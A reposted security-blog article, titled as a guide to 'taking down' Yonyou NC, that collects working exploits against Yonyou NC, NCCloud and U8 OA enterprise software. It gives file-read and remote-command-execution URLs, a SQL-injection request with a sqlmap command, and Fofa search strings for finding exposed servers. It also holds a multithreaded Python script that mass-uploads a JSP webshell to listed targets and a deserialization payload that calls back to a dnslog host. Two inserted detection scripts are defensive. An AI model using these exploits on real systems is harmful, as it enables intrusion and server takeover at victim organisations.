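One Article to Help You Take Down Yonyou NC

admin, 2022-04-21 12:37:05, Security Articles

Disclaimer

This article is for technical discussion and study only. Any direct or indirect consequences or losses caused by using the information it provides are the sole responsibility of the user; the author accepts no liability.

It is to be used only for testing authorized targets. The author accepts no responsibility for testing of unauthorized targets; that responsibility rests entirely with the person doing the testing.

Article body

Reposted from: https://github.com/j2ekim/YonyouNC_Tip

Yonyou NC vulnerability roundup

1 Arbitrary file read

The filename parameter can read all of the files listed below; in some cases directory traversal can be used to read files such as /etc/passwd.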

http://x.x.x.x/NCFindWeb?service=IPreAlertConfigService&filename=/

3.2 bsh.servlet.BshServlet remote command execution

Yonyou NC's bsh.servlet.BshServlet has a remote command execution vulnerability: remote commands are executed through BeanShell to gain control of the server.

PoC:

http://x.x.x.x/service/~aim/bsh.servlet.BshServlet
http://x.x.x.x/service/~alm/bsh.servlet.BshServlet
http://x.x.x.x/service/~ampub/bsh.servlet.BshServlet
http://x.x.x.x/service/~arap/bsh.servlet.BshServlet
http://x.x.x.x/service/~aum/bsh.servlet.BshServlet
http://x.x.x.x/service/~cc/bsh.servlet.BshServlet
http://x.x.x.x/service/~cdm/bsh.servlet.BshServlet
http://x.x.x.x/service/~cmp/bsh.servlet.BshServlet
http://x.x.x.x/service/~ct/bsh.servlet.BshServlet
http://x.x.x.x/service/~dm/bsh.servlet.BshServlet
http://x.x.x.x/service/~erm/bsh.servlet.BshServlet
http://x.x.x.x/service/~fa/bsh.servlet.BshServlet
http://x.x.x.x/service/~fac/bsh.servlet.BshServlet
http://x.x.x.x/service/~fbm/bsh.servlet.BshServlet
http://x.x.x.x/service/~ff/bsh.servlet.BshServlet
http://x.x.x.x/service/~fip/bsh.servlet.BshServlet
http://x.x.x.x/service/~fipub/bsh.servlet.BshServlet
http://x.x.x.x/service/~fp/bsh.servlet.BshServlet
http://x.x.x.x/service/~fts/bsh.servlet.BshServlet
http://x.x.x.x/service/~fvm/bsh.servlet.BshServlet
http://x.x.x.x/service/~gl/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrhi/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrjf/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrpd/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrpub/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrtrn/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrwa/bsh.servlet.BshServlet
http://x.x.x.x/service/~ia/bsh.servlet.BshServlet
http://x.x.x.x/service/~ic/bsh.servlet.BshServlet
http://x.x.x.x/service/~iufo/bsh.servlet.BshServlet
http://x.x.x.x/service/~modules/bsh.servlet.BshServlet
http://x.x.x.x/service/~mpp/bsh.servlet.BshServlet
http://x.x.x.x/service/~obm/bsh.servlet.BshServlet
http://x.x.x.x/service/~pu/bsh.servlet.BshServlet
http://x.x.x.x/service/~qc/bsh.servlet.BshServlet
http://x.x.x.x/service/~sc/bsh.servlet.BshServlet
http://x.x.x.x/service/~scmpub/bsh.servlet.BshServlet
http://x.x.x.x/service/~so/bsh.servlet.BshServlet
http://x.x.x.x/service/~so2/bsh.servlet.BshServlet
http://x.x.x.x/service/~so3/bsh.servlet.BshServlet
http://x.x.x.x/service/~so4/bsh.servlet.BshServlet
http://x.x.x.x/service/~so5/bsh.servlet.BshServlet
http://x.x.x.x/service/~so6/bsh.servlet.BshServlet
http://x.x.x.x/service/~tam/bsh.servlet.BshServlet
http://x.x.x.x/service/~tbb/bsh.servlet.BshServlet
http://x.x.x.x/service/~to/bsh.servlet.BshServlet
http://x.x.x.x/service/~uap/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapbd/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapde/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapeai/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapother/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapqe/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapweb/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapws/bsh.servlet.BshServlet
http://x.x.x.x/service/~vrm/bsh.servlet.BshServlet
http://x.x.x.x/service/~yer/bsh.servlet.BshServlet
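
A detection sketch for the two request patterns above, added here and not part of the original article or the linked repository: it scans web access log lines for any /service/~<module>/bsh.servlet.BshServlet request and for NCFindWeb requests whose filename parameter is absolute or contains a traversal sequence. The combined log format, the rule names, the treatment of a bare file name as benign and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: ip ident user [time] "METHOD URI PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
# Any module prefix is matched, since the URL list above may not be exhaustive.
BSH_RE = re.compile(r'^/service/~[^/]+/bsh\.servlet\.BshServlet$', re.IGNORECASE)

def classify(line):
    """Return (rule, client_ip, http_status) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["uri"])
    path = unquote(parts.path)
    hit = None
    if BSH_RE.match(path):
        hit = "bshservlet-request"
    elif path.lower() == "/ncfindweb":
        # parse_qs decodes once; decode again to catch double-encoded values
        names = [unquote(v) for v in parse_qs(parts.query).get("filename", [])]
        if any(n.startswith(("/", "\\")) or ".." in n for n in names):
            hit = "ncfindweb-filename-path"
    return (hit, m["ip"], int(m["status"])) if hit else None

def scan(lines):
    """Classify every line; hits answered with 200 sort first for triage."""
    hits = [h for h in map(classify, lines) if h]
    return sorted(hits, key=lambda h: h[2] != 200)

# Constructed sample log lines (documentation-range addresses), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [21/Apr/2022:12:00:01 +0800] "GET /service/~uapws/bsh.servlet.BshServlet HTTP/1.1" 200 1523',
    '198.51.100.9 - - [21/Apr/2022:12:00:05 +0800] "POST /service/~gl/bsh.servlet.BshServlet HTTP/1.1" 404 0',
    '203.0.113.7 - - [21/Apr/2022:12:00:09 +0800] "GET /NCFindWeb?service=IPreAlertConfigService&filename=/ HTTP/1.1" 200 930',
    '198.51.100.4 - - [21/Apr/2022:12:00:11 +0800] "GET /NCFindWeb?service=IPreAlertConfigService&filename=index.jsp HTTP/1.1" 200 410',
    '198.51.100.4 - - [21/Apr/2022:12:00:12 +0800] "GET /platform/yonyou-yyy.js HTTP/1.1" 200 88211',
]

if __name__ == "__main__":
    for rule, ip, status in scan(SAMPLE):
        print(f"{rule:26} {ip:15} status={status}")
```

A 200 on a bshservlet-request hit means the servlet is deployed and reachable from that client, which is the condition to fix at the application server or reverse proxy.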

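3.3 Yonyou NCCloud FS file management SQL injection

The login page of Yonyou NCCloud FS file management does not filter the username parameter, so it is vulnerable to SQL injection.

Fofa:

"/platform/yonyou-yyy.js"

nccloud login page: (screenshot)

File server management login page:

http://x.x.x.x/fs/

The username parameter is injectable. Capture the login request: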

GET /fs/console?username=1&password=00PGRLxSTe3VroI21qJNymCrZfPX1UQ4ij0gIWn2Gc4%3D HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://x.x.x.x/fs/
Cookie: JSESSIONID=FFAE8EF48BD3BEF7E94B5449B8F9BA90.server
Upgrade-Insecure-Requests: 1

Run the injection with sqlmap:

sqlmap -r text.txt -p username

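3.4 Yonyou NC 6.5 unauthenticated file upload

Yonyou NC 6.5 has an unauthenticated file upload vulnerability: an attacker can upload arbitrary files without authentication and thereby gain control of the server.

Fofa:

"/platform/yonyou-yyy.js"

PoC: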

import requests
import threadpool
import urllib3
import sys
import argparse

urllib3.disable_warnings()
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
header = {
   "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
   "Content-Type": "application/x-www-form-urlencoded",
   "Referer": "https://google.com",
}

def multithreading(funcname, filename="url.txt", pools=5):
   works = []
   with open(filename, "r") as f:
       for i in f:
           # strip the trailing newline from each line of the list file
           func_params = [i.rstrip("\n")]
           works.append((func_params, None))
   pool = threadpool.ThreadPool(pools)
   reqs = threadpool.makeRequests(funcname, works)
   [pool.putRequest(req) for req in reqs]
   pool.wait()

def wirte_targets(vurl, filename):
   with open(filename, "a+") as f:
       f.write(vurl + "\n")
       return vurl
   
def exp(u):
   uploadHeader = {
       "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
       "Content-Type": "multipart/form-data;",
       "Referer": "https://google.com"
  }
   uploadData = "xacxedx00x05x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x02x74x00x09x46x49x4cx45x5fx4ex41x4dx45x74x00x09x74x30x30x6cx73x2ex6ax73x70x74x00x10x54x41x52x47x45x54x5fx46x49x4cx45x5fx50x41x54x48x74x00x10x2ex2fx77x65x62x61x70x70x73x2fx6ex63x5fx77x65x62x78"
   shellFlag="t0test0ls"
   uploadData+=shellFlag
   try:
       req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)
       if req1.status_code == 200 :
           req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)

           if  req3.text.index(shellFlag)>=0:
               printFlag = "[Getshell]" + u+"/t00ls.jsp"  + "\n"
               print (printFlag)
               wirte_targets(printFlag, "vuln.txt")
   except :
       pass
   #print(printFlag, end="")


if __name__ == "__main__":
   if (len(sys.argv)) < 2:
       print('usage : python ' + str(sys.argv[0]) + ' -h')
   else:
       parser = argparse.ArgumentParser()
       parser.description = 'YONYOU UC 6.5 FILE UPLOAD!'
       parser.add_argument('-u', help="url -> example", type=str, dest='check_url')
       parser.add_argument('-r', help="url list to file", type=str, dest='check_file')
       args = parser.parse_args()
       if args.check_url:
           exp(args.check_url)

       if args.check_file:
           multithreading(exp, args.check_file, 8)

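Of course, a tool can also be used:

Yonyou NC-OA vulnerability collection

3.5 Yonyou NC XbrlPersistenceServlet deserialization

Yonyou NC 6.5 is known to have a deserialization vulnerability; an attacker can execute system commands and gain control of the server.

/service/~xbrl/XbrlPersistenceServlet

PoC: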

import requests
import threadpool
import urllib3
import sys
import base64

ip = "x.x.x.x"
dnslog = "*****"  # convert the dnslog string to hex and substitute it here; ceye.io, used for testing, shows the callback
data = "xacxedx00x05x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x73x72x00x0cx6ax61x76x61x2ex6ex65x74x2ex55x52x4cx96x25x37x36x1axfcxe4x72x03x00x07x49x00x08x68x61x73x68x43x6fx64x65x49x00x04x70x6fx72x74x4cx00x09x61x75x74x68x6fx72x69x74x79x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx4cx00x04x66x69x6cx65x71x00x7ex00x03x4cx00x04x68x6fx73x74x71x00x7ex00x03x4cx00x08x70x72x6fx74x6fx63x6fx6cx71x00x7ex00x03x4cx00x03x72x65x66x71x00x7ex00x03x78x70xffxffxffxffx00x00x00x50x74x00x11"+dnslog+"x3ax38x30x74x00x00x74x00x0e"+dnslog+"x74x00x04x68x74x74x70x70x78x74x00x18x68x74x74x70x3ax2fx2f"+dnslog+"x3ax38x30x78"

uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://" + ip + "/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)
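
A defender-side check for the request bodies in 3.4 (FileReceiveServlet) and 3.5 (XbrlPersistenceServlet), added here and not taken from the original article: both bodies begin with the Java serialization stream header AC ED 00 05 followed by a java.util.HashMap class descriptor, so a proxy or log pipeline can recognise a serialized object posted to these paths. The function names, the "alert" verdict and the assumption that no legitimate external client posts serialized objects to these endpoints are illustrative.

```python
import struct

STREAM_MAGIC = 0xACED      # java.io.ObjectStreamConstants.STREAM_MAGIC
STREAM_VERSION = 5         # java.io.ObjectStreamConstants.STREAM_VERSION
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72

# Endpoints named on this page that accept a raw serialized request body.
WATCHED = ("/servlet/FileReceiveServlet", "/service/~xbrl/XbrlPersistenceServlet")

def top_level_class(body: bytes):
    """Class name of the first object in a Java serialization stream,
    '' if it is a stream whose first element is not a plain object,
    None if the body is not a serialization stream at all."""
    if len(body) < 4:
        return None
    magic, version = struct.unpack(">HH", body[:4])
    if magic != STREAM_MAGIC or version != STREAM_VERSION:
        return None
    if len(body) < 8 or body[4] != TC_OBJECT or body[5] != TC_CLASSDESC:
        return ""
    (n,) = struct.unpack(">H", body[6:8])   # length-prefixed class name
    name = body[8:8 + n]
    if len(name) < n:
        return ""                           # truncated descriptor
    return name.decode("utf-8", "replace")

def inspect(method: str, path: str, body: bytes) -> str:
    """Verdict for one request: 'pass' or an 'alert: ...' string."""
    if method != "POST" or path not in WATCHED:
        return "pass"
    cls = top_level_class(body)
    if cls is None:
        return "pass"
    return f"alert: serialized {cls or 'object'} posted to {path}"

# Constructed sample: stream header plus class descriptor name only, no object data.
SAMPLE_BODY = bytes.fromhex("aced0005" "7372" "0011") + b"java.util.HashMap"

if __name__ == "__main__":
    print(inspect("POST", "/servlet/FileReceiveServlet", SAMPLE_BODY))
    print(inspect("POST", "/servlet/FileReceiveServlet", b"username=1"))
```

On the server itself, a deserialization filter (JEP 290) that rejects unexpected classes is the stronger control; this check only makes the requests visible at the edge.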

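3.6 Yonyou U8 OA SQL injection

The test.jsp file in Yonyou U8 OA has a SQL injection vulnerability.

Fofa:

"/yyoa/seeyonoa/common/"

PoC:

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

Run it through sqlmap.

3.7 XXE vulnerability

XXE vulnerability at the interface.

PoC:

/uapws/service/nc.uap.oba.update.IUpdateService?wsdl

3.8 Interface information disclosure

One of the interfaces listed there can return the database account and password, although this applies only to old versions.

/uapws/service

3.9 Console password bypass

Enter any account and password, intercept the response and change the 0 in it to 1, and you can log in as any user.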

Originally published on the WeChat official account Z2O安全攻防: One Article to Help You Take Down Yonyou NC

Published by admin on 2022-04-21 12:37:05 at CN-SEC中文网: http://cn-sec.com/archives/931578.html
